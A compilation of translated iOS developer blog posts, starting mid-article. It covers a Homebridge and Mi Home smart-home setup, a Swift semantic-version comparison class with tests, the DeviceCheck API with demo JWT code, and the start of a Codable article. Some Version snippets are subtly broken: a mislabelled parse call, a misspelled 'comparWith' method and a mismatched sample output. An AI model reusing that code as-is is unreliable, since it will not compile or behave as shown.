+ "username": "CC:22:3D:E3:CE:30",
+ "port": 51826,
+ "pin": "123-45-568"
+ },
+
+ "accessories": [
+ {
+ "accessory": "MijiaCamera",
+ "name": "Mi Camera",
+ "ip": "",
+ "token": ""
+ }
+ ],
+
+ "platforms": [
+ {
+ "platform" : "yeelight",
+ "name" : "yeelight"
+ }
+ ]
+}
+
Then go back to the “Terminal” and enter:
1
+
sudo homebridge start
+
or
1
+
sudo homebridge restart
+
You will see the unsupported Mi Home LED Smart Desk Lamp added to the HomeKit “Home” APP!
And it also supports color and brightness adjustment!
After adding and bridging everything, open the “Home” APP again.
Follow the steps to add a scene scenario, here using “Going Home” as an example:
Click the “+” in the upper right corner -> Add Scenario -> Custom -> Enter the accessory name yourself (EX: Going Home) -> Click “Add Accessory” at the bottom -> Select the HomeKit accessories that have been connected -> Set the accessory status for this scene (Camera: Off / Desk Lamp: On) -> You can click “Test Scenario” to test -> Click “Done” in the upper right corner!
Now the scene is set! At this point, clicking the scene on the homepage will execute the settings for all the accessories inside!
There is also a quick tip, which is to directly click the house-shaped button in the pull-up control menu to quickly operate HomeKit/execute scenarios (you can switch modes in the upper right corner)!
Now that we have the intelligence, I want to achieve the ultimate goal: automatically turn off the camera and turn on the lights when I get home; automatically turn on the camera and turn off the lights when I leave home.
Switch to the third tab “Automation” to set it up. Unfortunately, I don’t have any of the aforementioned devices (iPad/Apple TV/HomePod) to act as a “Home Hub“, so I haven’t researched this part.
The principle seems to be that when you get home, the “Home Hub” detects your phone/watch and triggers it accurately!
By using a third-party app to connect to “Home” and add automation settings, you can use your phone’s GPS to achieve automation and unlock the “Automation” tab’s functionality.
p.s. GPS has an error margin of about 100 meters.
The third-party app I used is: myHome Plus
Download & install the app -> Open the app -> Allow access to “Home Data” -> You will see the data configuration of “Home” -> Click the “Settings button” in the upper right corner -> Click “My Home” to enter -> Scroll down to the “Triggers” area -> Click “Add Trigger”
Select “Location” as the trigger type -> Enter a name (EX: Going Home) -> Click “Set Location” to set the location area -> Then in REGION STATUS, you can set whether to enter or leave the area -> Finally, in SCENES, you can choose the corresponding “scenario” to execute (created above).
After clicking “Done” in the upper right corner to save, go back to the “Home” app, and you will see that the “Automation” tab is now available!
At this point, you can click the “+” in the upper right corner to directly add automation scripts using the “Home” app!
The steps are similar to the third-party app, but with better integration! After creating the automation using the native “Home” app, you can also swipe to delete the one created with the third-party app.
!! Just note that you need to keep at least one; otherwise, the tab will revert to its original locked state!!
Siri Voice Control:
Compared to the Mi Home introduced below, HomeKit has a high level of integration and can directly use voice control for the set accessories and execute scenes without additional settings.
This concludes the introduction to HomeKit settings. Next, let’s explain how to use Mi Home’s native smart home features.
Here I encountered a confusing point: I couldn’t find the same Mi Home desk lamp in the list of new devices in Mi Home. The answer is:
Just look at the text, this is it
Other devices: For the camera and Pro desk lamp, just follow the official instructions to add them, no need to elaborate here.
Scene Scenario Settings:
Similar to the “Home” setup -> Switch to the “Smart” tab -> Select “Manual Execution” -> Choose device operation at the bottom (since it’s native, you can choose more functions) -> Continue to add other devices (desk lamp) -> Click “Save” to complete!
Someone might ask why not just choose “leave or arrive at a place”? Because this function is useless, the app is not optimized for Taiwan’s GPS, which is wrong, and its positioning can only be set on landmarks. If your location has that, you can directly use this function. You can skip the rest of the article!
For the quick switch part, you can set the widget from “My” -> “Widgets”!
This way, you can quickly execute scenes and devices from the notification center!
You can also control the widget from Apple Watch! *If the watch app keeps showing blank, please delete and reinstall the watch or phone app. This app has quite a few bugs.
Here, we still need to use the GPS sensing method. If the scene added above is “leave or arrive at a place”, you can skip the following settings!
* * * * *
iOS ≥ 13.1 Use the “Shortcuts” automation feature with Mi Home smart home, click to view»
* * * * *
iOS ≥ 12, iOS < 13 Only:
Use the built-in Shortcuts app with IFTTT
First, go to “My” -> “Experimental Features” -> “iOS Shortcuts” -> “Add Mi Home scenes to Shortcuts”
Open the system-built “ Shortcuts “ app (if you can’t find it, please search and download it from the App Store)
Click the “+” in the upper right corner to create a shortcut -> Click the settings button below the upper right corner -> Name -> Enter a name (it is recommended to use English, because you will use it later)
Return to the new shortcut page -> Enter “Mi Home” in the search menu below -> Add the corresponding scene set in Mi Home, and turn off “Show When Run” otherwise it will open the Mi Home app after execution.
*If you can’t find Mi Home, please go back to the Mi Home app and try to toggle “My” -> “Experimental Features” -> “iOS Shortcuts” -> “Add Mi Home scenes to Shortcuts”, and restart the “Shortcuts” app.
At this time, we need to use a third-party app again. We use IFTTT to create a GPS entry and exit background trigger. Search for “ IFTTT “ in the App Store to download and install.
Open IFTTT, log in to your account, switch to the “My Applets” tab, click the “+” in the upper right corner to add -> Click “+this” -> Search for “Location” -> Choose whether to enter or leave
Set the location -> Click “Create trigger” to confirm -> Then click “+that” below -> Search for “notification”
Choose “Send a rich notification from the IFTTT app”:
Title = Notification title, Message = Notification content
Link URL, please enter: shortcuts://run-shortcut?name= Shortcut name
So it’s recommended to set the shortcut name in English
-> Click “Create action” -> You can click “Edit title” to set the name
-> “Finish” save completed!
You will receive a triggered notification the next time you leave/enter the set area range (with an error range of about 100 meters). Clicking the notification will automatically execute the Mi Home scene!
Clicking the notification will automatically execute the scene in the background
For Siri voice control:
Since Mi Home is not an Apple built-in app, you need to set it up separately to support Siri voice control:
In the “Smart” Tab -> “Add to Siri” -> Select “Target Scene” and click “Add to Siri”
-> Click the red record command (EX: turn off the light) -> Done!
You can directly call and control the scene execution in Siri!
To summarize the above setup steps:
For a good experience, you need to spend a lot of money to buy appliances with the HomeKit logo (so you don’t need to keep a Mac running HomeBridge, and it integrates perfectly with the native Apple Home function). You also need to buy a HomePod or Apple TV, or iPad as the home hub; both HomeKit appliances and home hubs are not cheap!
If you have technical skills, you can consider using third-party smart devices (such as Mi Home) with a Raspberry Pi to run HomeBridge.
If you are an ordinary person like me, it is still most convenient to use Mi Home directly. Currently, my usage habit is to execute scene operations from the notification center shortcut widget when coming home or leaving home; the Shortcuts app with IFTTT is only used for notification reminders, in case I forget sometimes.
Although the current experience has not reached the ideal goal, it has already taken a step closer to a “smart home”!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Version number rules and comparison solutions
Photo by James Yarema
All iOS APP developers will encounter two numbers, Version Number and Build Number; recently, I had a requirement related to version numbers, to prompt users to rate the APP, and I took the opportunity to explore version numbers; at the end of the article, I will also provide my comprehensive solution for version number comparison.
First, let’s introduce the “ Semantic Versioning “ specification, which mainly addresses software dependency and management issues, such as the commonly used Cocoapods; suppose I use Moya 4.0 today, Moya 4.0 uses and depends on Alamofire 2.0.0. If Alamofire is updated, it could be a new feature, a bug fix, or a complete overhaul (incompatible with the old version); without a common consensus on version numbers, it would be chaotic because you wouldn’t know which version is compatible and updatable.
Semantic versioning consists of three parts: x.y.z
General rules:
Comparison method:
First compare the major version, if the major version is equal, then compare the minor version, if the minor version is equal, then compare the patch version.
ex: 1.0.0 < 2.0.0 < 2.1.0 < 2.1.1
Additionally, you can add “pre-release version information (ex: 1.0.1-alpha)” or “build metadata (ex: 1.0.0-alpha+001)” after the patch version, but iOS APP version numbers do not allow these formats to be uploaded to the App Store, so they will not be elaborated here. For details, refer to “ Semantic Versioning “.
✅: 1.0.1, 1.0.0, 5.6.7 ❌: 01.5.6, a1.2.3, 2.005.6
Regarding practical use in iOS APP version control, since we only use it as a marker for the release APP version and there are no dependency issues with other APPs or software; the actual usage definition is up to each team. The following is just my personal opinion:
Generally, the revision number is only changed for emergency fixes (Hot Fix), and under normal circumstances, it remains 0. If a new version is released, it can be reset to 0.
EX: First version release (1.0.0) -> Strengthen the first version’s features (1.1.0) -> Found an issue to fix (1.1.1) -> Found another issue (1.1.2) -> Continue to strengthen the first version’s features (1.2.0) -> Major update (2.0.0) -> Found an issue to fix (2.0.1) … and so on
CFBundleShortVersionString
It is generally customary to use semantic versioning x.y.z or x.y.
CFBundleVersion
It is generally customary to use dates, numbers (starting from 0 for each new version), and use CI/fastlane to automatically increment the build number during packaging.
A brief survey of the version number formats of apps on the leaderboard, as shown in the image above.
Generally, x.y.z is still the main format.
Sometimes we need to use version numbers for judgment, for example: force update if below x.y.z version, prompt for rating if equal to a certain version. In such cases, we need a function to compare two version strings.
1
+2
+3
+4
+5
+
let version = "1.0.0"
+print(version.compare("1.0.0", options: .numeric) == .orderedSame) // true 1.0.0 = 1.0.0
+print(version.compare("1.22.0", options: .numeric) == .orderedAscending) // true 1.0.0 < 1.22.0
+print(version.compare("0.0.9", options: .numeric) == .orderedDescending) // true 1.0.0 > 0.0.9
+print(version.compare("2", options: .numeric) == .orderedAscending) // true 1.0.0 < 2
+
You can also write a String Extension:
1
+2
+3
+4
+5
+
extension String {
+ func versionCompare(_ otherVersion: String) -> ComparisonResult {
+ return self.compare(otherVersion, options: .numeric)
+ }
+}
+
⚠️ However, note that if the formats are different, the judgment will be incorrect:
1
+2
+
let version = "1.0.0"
+version.compare("1", options: .numeric) //.orderedDescending
+
In reality, we know 1 == 1.0.0, but using this method will result in .orderedDescending
; you can refer to this article for padding with 0 before comparing; under normal circumstances, once we decide on an APP version format, it should not change. If using x.y.z, stick with x.y.z, do not switch between x.y.z and x.y.
Can directly use the existing wheel: mrackwitz/Version Below is the recreation of the wheel.
The complex method here follows the semantic versioning x.y.z as the format specification, using Regex for string parsing and implementing comparison operators by ourselves. In addition to the basic =/>/≥/< /≤, we also implemented the ~> operator (same as the Cocoapods version specification method) and support static input.
The definition of the ~> operator is:
Greater than or equal to this version but less than this version’s (previous level version number +1)
1
+2
+3
+4
+
EX:
+~> 1.2.1: (1.2.1 <= version < 1.3) 1.2.3,1.2.4...
+~> 1.2: (1.2 <= version < 2) 1.3,1.4,1.5,1.3.2,1.4.1...
+~> 1: (1 <= version < 2) 1.1.2,1.2.3,1.5.9,1.9.0...
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+
@objcMembers
+class Version: NSObject {
+ private(set) var major: Int
+ private(set) var minor: Int
+ private(set) var patch: Int
+
+ override var description: String {
+ return "\(self.major),\(self.minor),\(self.patch)"
+ }
+
+ init(_ major: Int, _ minor: Int, _ patch: Int) {
+ self.major = major
+ self.minor = minor
+ self.patch = patch
+ }
+
+ init(_ string: String) throws {
+ let result = try Version.parse(string: string)
+ self.major = result.version.major
+ self.minor = result.version.minor
+ self.patch = result.version.patch
+ }
+
+ static func parse(string: String) throws -> VersionParseResult {
+ let regex = "^(?:(>=|>|<=|<|~>|=|!=){1}\\s*)?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)$"
+ let result = string.groupInMatches(regex)
+
+ if result.count == 4 {
+ //start with operator...
+ let versionOperator = VersionOperator(string: result[0])
+ guard versionOperator != .unSupported else {
+ throw VersionUnSupported()
+ }
+ let major = Int(result[1]) ?? 0
+ let minor = Int(result[2]) ?? 0
+ let patch = Int(result[3]) ?? 0
+ return VersionParseResult(versionOperator, Version(major, minor, patch))
+ } else if result.count == 3 {
+ //unSpecified operator...
+ let major = Int(result[0]) ?? 0
+ let minor = Int(result[1]) ?? 0
+ let patch = Int(result[2]) ?? 0
+ return VersionParseResult(.unSpecified, Version(major, minor, patch))
+ } else {
+ throw VersionUnSupported()
+ }
+ }
+}
+
+//Supported Objects
+@objc class VersionUnSupported: NSObject, Error { }
+
+@objc enum VersionOperator: Int {
+ case equal
+ case notEqual
+ case higherThan
+ case lowerThan
+ case lowerThanOrEqual
+ case higherThanOrEqual
+ case optimistic
+
+ case unSpecified
+ case unSupported
+
+ init(string: String) {
+ switch string {
+ case ">":
+ self = .higherThan
+ case "<":
+ self = .lowerThan
+ case "<=":
+ self = .lowerThanOrEqual
+ case ">=":
+ self = .higherThanOrEqual
+ case "~>":
+ self = .optimistic
+ case "=":
+ self = .equal
+ case "!=":
+ self = .notEqual
+ default:
+ self = .unSupported
+ }
+ }
+}
+
+@objcMembers
+class VersionParseResult: NSObject {
+ var versionOperator: VersionOperator
+ var version: Version
+ init(_ versionOperator: VersionOperator, _ version: Version) {
+ self.versionOperator = versionOperator
+ self.version = version
+ }
+}
+
You can see that Version is a storage for major, minor, and patch, and the parsing method is written as static for external calls. It can accept formats like 1.0.0
or ≥1.0.1
, making it convenient for string parsing and configuration file parsing.
1
+2
+
Input: 1.0.0 => Output: .unSpecified, Version(1.0.0)
+Input: ≥ 1.0.1 => Output: .higherThanOrEqual, Version(1.0.0)
+
The Regex is modified based on the Regex provided in the “Semantic Versioning Specification”:
1
+
^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$
+
*Considering the project is mixed with Objective-C, it should be usable in OC as well, so everything is declared as @objcMembers, and compromises are made to use OC-compatible syntax.
(Actually, you can directly use VersionOperator with enum: String, and Result with tuple/struct)
*If the implemented object is derived from NSObject, remember to implement != when implementing Comparable/Equatable ==, as the original NSObject’s != operation will not yield the expected result.
2. Implement Comparable methods:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+
extension Version: Comparable {
+ static func < (lhs: Version, rhs: Version) -> Bool {
+ if lhs.major < rhs.major {
+ return true
+ } else if lhs.major == rhs.major {
+ if lhs.minor < rhs.minor {
+ return true
+ } else if lhs.minor == rhs.minor {
+ if lhs.patch < rhs.patch {
+ return true
+ }
+ }
+ }
+
+ return false
+ }
+
+ static func == (lhs: Version, rhs: Version) -> Bool {
+ return lhs.major == rhs.major && lhs.minor == rhs.minor && lhs.patch == rhs.patch
+ }
+
+ static func != (lhs: Version, rhs: Version) -> Bool {
+ return !(lhs == rhs)
+ }
+
+ static func ~> (lhs: Version, rhs: Version) -> Bool {
+ let start = Version(lhs.major, lhs.minor, lhs.patch)
+ let end = Version(lhs.major, lhs.minor, lhs.patch)
+
+ if end.patch >= 0 {
+ end.minor += 1
+ end.patch = 0
+ } else if end.minor > 0 {
+ end.major += 1
+ end.minor = 0
+ } else {
+ end.major += 1
+ }
+ return start <= rhs && rhs < end
+ }
+
+ func compareWith(_ version: Version, operator: VersionOperator) -> Bool {
+ switch `operator` {
+ case .equal, .unSpecified:
+ return self == version
+ case .notEqual:
+ return self != version
+ case .higherThan:
+ return self > version
+ case .lowerThan:
+ return self < version
+ case .lowerThanOrEqual:
+ return self <= version
+ case .higherThanOrEqual:
+ return self >= version
+ case .optimistic:
+ return self ~> version
+ case .unSupported:
+ return false
+ }
+ }
+}
+
It is actually implementing the judgment logic described earlier, and finally opening a compareWith method for easy external input of the parsing results to get the final judgment.
Usage Example:
1
+2
+3
+4
+5
+6
+7
+8
+
let shouldAskUserFeedbackVersion = ">= 2.0.0"
+let currentVersion = "3.0.0"
+do {
+ let result = try Version.parse(shouldAskUserFeedbackVersion)
+ result.version.comparWith(currentVersion, result.operator) // true
+} catch {
+ print("version string parse error!")
+}
+
Or…
1
+
Version(1,0,0) >= Version(0,0,9) //true...
+
Supports
>/≥/</≤/=/!=/~>
operators.
Test cases…
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+
import XCTest
+
+class VersionTests: XCTestCase {
+ func testHigher() throws {
+ let version = Version(3, 12, 1)
+ XCTAssertEqual(version > Version(2, 100, 120), true)
+ XCTAssertEqual(version > Version(3, 12, 0), true)
+ XCTAssertEqual(version > Version(3, 10, 0), true)
+ XCTAssertEqual(version >= Version(3, 12, 1), true)
+
+ XCTAssertEqual(version > Version(3, 12, 1), false)
+ XCTAssertEqual(version > Version(3, 12, 2), false)
+ XCTAssertEqual(version > Version(4, 0, 0), false)
+ XCTAssertEqual(version > Version(3, 13, 1), false)
+ }
+
+ func testLower() throws {
+ let version = Version(3, 12, 1)
+ XCTAssertEqual(version < Version(2, 100, 120), false)
+ XCTAssertEqual(version < Version(3, 12, 0), false)
+ XCTAssertEqual(version < Version(3, 10, 0), false)
+ XCTAssertEqual(version <= Version(3, 12, 1), true)
+
+ XCTAssertEqual(version < Version(3, 12, 1), false)
+ XCTAssertEqual(version < Version(3, 12, 2), true)
+ XCTAssertEqual(version < Version(4, 0, 0), true)
+ XCTAssertEqual(version < Version(3, 13, 1), true)
+ }
+
+ func testEqual() throws {
+ let version = Version(3, 12, 1)
+ XCTAssertEqual(version == Version(3, 12, 1), true)
+ XCTAssertEqual(version == Version(3, 12, 21), false)
+ XCTAssertEqual(version != Version(3, 12, 1), false)
+ XCTAssertEqual(version != Version(3, 12, 2), true)
+ }
+
+ func testOptimistic() throws {
+ let version = Version(3, 12, 1)
+ XCTAssertEqual(version ~> Version(3, 12, 1), true) //3.12.1 <= $0 < 3.13.0
+ XCTAssertEqual(version ~> Version(3, 12, 9), true) //3.12.1 <= $0 < 3.13.0
+ XCTAssertEqual(version ~> Version(3, 13, 0), false) //3.12.1 <= $0 < 3.13.0
+ XCTAssertEqual(version ~> Version(3, 11, 1), false) //3.12.1 <= $0 < 3.13.0
+ XCTAssertEqual(version ~> Version(3, 13, 1), false) //3.12.1 <= $0 < 3.13.0
+ XCTAssertEqual(version ~> Version(2, 13, 0), false) //3.12.1 <= $0 < 3.13.0
+ XCTAssertEqual(version ~> Version(3, 11, 100), false) //3.12.1 <= $0 < 3.13.0
+ }
+
+ func testVersionParse() throws {
+ let unSpecifiedVersion = try? Version.parse(string: "1.2.3")
+ XCTAssertNotNil(unSpecifiedVersion)
+ XCTAssertEqual(unSpecifiedVersion!.version == Version(1, 2, 3), true)
+ XCTAssertEqual(unSpecifiedVersion!.versionOperator, .unSpecified)
+
+ let optimisticVersion = try? Version.parse(string: "~> 1.2.3")
+ XCTAssertNotNil(optimisticVersion)
+ XCTAssertEqual(optimisticVersion!.version == Version(1, 2, 3), true)
+ XCTAssertEqual(optimisticVersion!.versionOperator, .optimistic)
+
+ let higherThanVersion = try? Version.parse(string: "> 1.2.3")
+ XCTAssertNotNil(higherThanVersion)
+ XCTAssertEqual(higherThanVersion!.version == Version(1, 2, 3), true)
+ XCTAssertEqual(higherThanVersion!.versionOperator, .higherThan)
+
+ XCTAssertThrowsError(try Version.parse(string: "!! 1.2.3")) { error in
+ XCTAssertEqual(error is VersionUnSupported, true)
+ }
+ }
+}
+
Currently planning to further optimize Version, adjust performance tests, organize packaging, and then run through the process of creating my own cocoapods.
However, there is already a very complete Version handling Pod project, so there is no need to reinvent the wheel. I just want to streamline the creation process XD.
Maybe I will also submit a PR for the existing wheel to implement ~>
.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
iOS DeviceCheck follows you everywhere
While writing the previous Call Directory Extension, I accidentally discovered this obscure API. Although it’s not something new (announced at WWDC 2017/iOS ≥11 support) and the implementation is very simple, I still did a little research and testing and organized this article as a record.
Allows developers to identify and mark the user’s device
Since iOS ≥ 6, developers cannot obtain the unique identifier (UUID) of the user’s device. The compromise is to use IDFV combined with KeyChain (for details, refer to this article), but in situations like changing iCloud accounts or resetting the phone, the UUID will still reset. It cannot guarantee the uniqueness of the device. If used for storing and judging some business logic, such as the first free trial, users might exploit the loophole by constantly changing accounts or resetting the phone to get unlimited trials.
Although DeviceCheck cannot provide a UUID that will never change, it can “store” information. Each device is given 2 bits of cloud storage space by Apple. By sending a temporary identification token generated by the device to Apple, you can write/read the 2 bits of information.
Only four states can be combined, so the functionality is limited.
✓ Indicates data is still there
p.s. I sacrificed my own phone for actual testing, and the results matched. Even if I logged out and changed iCloud, cleared all data, restored all settings, and returned to the factory initial state, I could still retrieve the value after reinstalling the app.
The iOS app generates a temporary token for device identification through the DeviceCheck API, sends it to the backend, which then combines the developer’s private key information and developer information into JWT format and sends it to the Apple server. The backend processes the result returned by Apple and sends it back to the iOS app.
Here is a screenshot of DeviceCheck from WWDC2017:
Since each device can only store 2 bits of information, the possible applications are limited to what the official mentions, such as whether the device has been trialed, paid, or blacklisted, etc., and only one can be implemented.
Support: iOS ≥ 11
After understanding the basic information, let’s get started!
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
import DeviceCheck
+//....
+//
+DCDevice.current.generateToken { dataOrNil, errorOrNil in
+ guard let data = dataOrNil else { return }
+ let deviceToken = data.base64EncodedString()
+
+ //...
+ //POST deviceToken to the backend, let the backend query the Apple server, and then return the result to the app for processing
+}
+
As described in the process, the app only needs to obtain the temporary identification token (deviceToken)!
Next, send the deviceToken to our backend API for processing.
The key part is the backend processing
Select “Keys” -> “All” -> Top right corner “+”
Step 1. Create a new Key, check “DeviceCheck”
Step 2. “Confirm”
Finished.
After completing the last step, note down the Key ID and click “Download” to download the privateKey.p8 private key file.
At this point, you have all the necessary information for push notifications:
Algorithm: ES256
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
//HEADER:
+{
+ "alg": "ES256",
+ "kid": Key ID
+}
+//PAYLOAD:
+{
+ "iss": Team ID,
+ "iat": request timestamp (Unix Timestamp, EX: 1556549164),
+ "exp": expiration timestamp (Unix Timestamp, EX: 1557000000)
+}
+//Timestamps must be in integer format!
+
Get the combined JWT string: xxxxxx.xxxxxx.xxxxxx
Like APNS push notifications, there are separate environments for development and production:
DeviceCheck API provides two operations: 1. Query stored data: https://api.devicecheck.apple.com/v1/query_two_bits
1
+2
+3
+4
+5
+6
+7
+
//Headers:
+Authorization: Bearer xxxxxx.xxxxxx.xxxxxx (combined JWT string)
+
+//Content:
+device_token: deviceToken (the device token to query)
+transaction_id: UUID().uuidString (query identifier, using UUID here)
+timestamp: request timestamp (milliseconds), note! This is in milliseconds (EX: 1556549164000)
+
Return status:
Return Content:
1
+2
+3
+4
+5
+
{
+ "bit0": Int: The first bit of the 2 bits data: 0 or 1,
+ "bit1": Int: The second bit of the 2 bits data: 0 or 1,
+ "last_update_time": String: "Last update time YYYY-MM"
+}
+
p.s. You read it right, the last update time can only be displayed up to year-month
2. Write Storage Data: https://api.devicecheck.apple.com/v1/update_two_bits
1
+2
+3
+4
+5
+6
+7
+8
+9
+
//Headers:
+Authorization: Bearer xxxxxx.xxxxxx.xxxxxx (combined JWT string)
+
+//Content:
+device_token:deviceToken (Device Token to query)
+transaction_id:UUID().uuidString (Query identifier, here directly represented by UUID)
+timestamp: Request timestamp (milliseconds), note! This is in milliseconds (EX: 1556549164000)
+bit0: The first bit of the 2 bits data: 0 or 1
+bit1: The second bit of the 2 bits data: 0 or 1
+
Return Status:
Return Content: None, return status 200 indicates a successful write!
The APP responds to the corresponding status and it’s done!
It’s been a long time since I touched PHP, if interested, please refer to iOS11で追加されたDeviceCheckについて for the requestToken.php part
Since I can’t provide backend implementation and not everyone knows PHP, here is a pure iOS (Swift) example that handles backend tasks (generating JWT, sending data to Apple) directly in the APP for reference!
You can simulate all content without writing backend code.
⚠ Please note for testing and demonstration purposes only, not recommended for production environment ⚠
Special thanks to Ethan Huang for providing CupertinoJWT which supports generating JWT content within the iOS APP!
Main Demo Code and Interface:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+
import UIKit
+import DeviceCheck
+import CupertinoJWT
+
+extension String {
+ var queryEncode: String {
+ return self.addingPercentEncoding(withAllowedCharacters: .whitespacesAndNewlines)?.replacingOccurrences(of: "+", with: "%2B") ?? ""
+ }
+}
+class ViewController: UIViewController {
+
+ @IBOutlet weak var getBtn: UIButton!
+ @IBOutlet weak var statusBtn: UIButton!
+ @IBAction func getBtnClick(_ sender: Any) {
+ DCDevice.current.generateToken { dataOrNil, errorOrNil in
+ guard let data = dataOrNil else { return }
+
+ let deviceToken = data.base64EncodedString()
+
+ //In a real situation:
+ //POST deviceToken to backend, let backend query Apple server, then return the result to the APP
+
+ //!!!!!! The following is for testing and demonstration purposes only, not recommended for production environment!!!!!!
+ //!!!!!! Do not expose your PRIVATE KEY casually!!!!!!
+ let p8 = """
+ -----BEGIN PRIVATE KEY-----
+ -----END PRIVATE KEY-----
+ """
+ let keyID = "" //Your KEY ID
+ let teamID = "" //Your Developer Team ID: https://developer.apple.com/account/#/membership
+
+ let jwt = JWT(keyID: keyID, teamID: teamID, issueDate: Date(), expireDuration: 60 * 60)
+
+ do {
+ let token = try jwt.sign(with: p8)
+ var request = URLRequest(url: URL(string: "https://api.devicecheck.apple.com/v1/update_two_bits")!)
+ request.httpMethod = "POST"
+ request.addValue("Bearer \(token)", forHTTPHeaderField: "Authorization")
+ request.addValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
+ let json: [String: Any] = ["device_token": deviceToken, "transaction_id": UUID().uuidString, "timestamp": Int(Date().timeIntervalSince1970.rounded()) * 1000, "bit0": true, "bit1": false]
+ request.httpBody = try? JSONSerialization.data(withJSONObject: json)
+
+ let task = URLSession.shared.dataTask(with: request) { (data, response, error) in
+ guard let data = data else {
+ return
+ }
+ print(String(data: data, encoding: String.Encoding.utf8))
+ DispatchQueue.main.async {
+ self.getBtn.isHidden = true
+ self.statusBtn.isSelected = true
+ }
+ }
+ task.resume()
+ } catch {
+ // Handle error
+ }
+ //!!!!!! The above is for testing and demonstration purposes only, not recommended for production environment!!!!!!
+ //
+ }
+ }
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ DCDevice.current.generateToken { dataOrNil, errorOrNil in
+ guard let data = dataOrNil else { return }
+
+ let deviceToken = data.base64EncodedString()
+
+ //In a real situation:
+ //POST deviceToken to backend, let backend query Apple server, then return the result to the APP
+
+ //!!!!!! The following is for testing and demonstration purposes only, not recommended for production environment!!!!!!
+ //!!!!!! Do not expose your PRIVATE KEY casually!!!!!!
+ let p8 = """
+ -----BEGIN PRIVATE KEY-----
+
+ -----END PRIVATE KEY-----
+ """
+ let keyID = "" //Your KEY ID
+ let teamID = "" //Your Developer Team ID: https://developer.apple.com/account/#/membership
+
+ let jwt = JWT(keyID: keyID, teamID: teamID, issueDate: Date(), expireDuration: 60 * 60)
+
+ do {
+ let token = try jwt.sign(with: p8)
+ var request = URLRequest(url: URL(string: "https://api.devicecheck.apple.com/v1/query_two_bits")!)
+ request.httpMethod = "POST"
+ request.addValue("Bearer \(token)", forHTTPHeaderField: "Authorization")
+ request.addValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
+ let json: [String: Any] = ["device_token": deviceToken, "transaction_id": UUID().uuidString, "timestamp": Int(Date().timeIntervalSince1970.rounded()) * 1000]
+ request.httpBody = try? JSONSerialization.data(withJSONObject: json)
+
+ let task = URLSession.shared.dataTask(with: request) { (data, response, error) in
+ guard let data = data, let json = try? JSONSerialization.jsonObject(with: data, options: .mutableContainers) as? [String: Any], let status = json["bit0"] as? Int else {
+ return
+ }
+ print(json)
+
+ if status == 1 {
+ DispatchQueue.main.async {
+ self.getBtn.isHidden = true
+ self.statusBtn.isSelected = true
+ }
+ }
+ }
+ task.resume()
+ } catch {
+ // Handle error
+ }
+ //!!!!!! The above is for testing and demonstration purposes only, not recommended for production environment!!!!!!
+ //
+ }
+ // Do any additional setup after loading the view.
+ }
+}
+
Screenshot
This is a one-time discount claim, each device can only claim once!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Handling Response Null Fields Reasonably, No Need to Always Rewrite init decoder
Photo by Zan
Following the previous article “Real-World Codable Decoding Issues”, as development progresses, new scenarios and problems have emerged. Hence, this part continues to document the encountered situations and research insights for future reference.
The previous part mainly solved the JSON String -> Entity Object Decodable Mapping. Once we have the Entity Object, we can convert it into a Model Object for use within the program, View Model Object for handling data display logic, etc. On the other hand, we need to convert the Entity into NSManagedObject to store it in local Core Data.
Assume our song Entity structure is as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
struct Song: Decodable {
+ var id: Int
+ var name: String?
+ var file: String?
+ var coverImage: String?
+ var likeCount: Int?
+ var like: Bool?
+ var length: Int?
+}
+
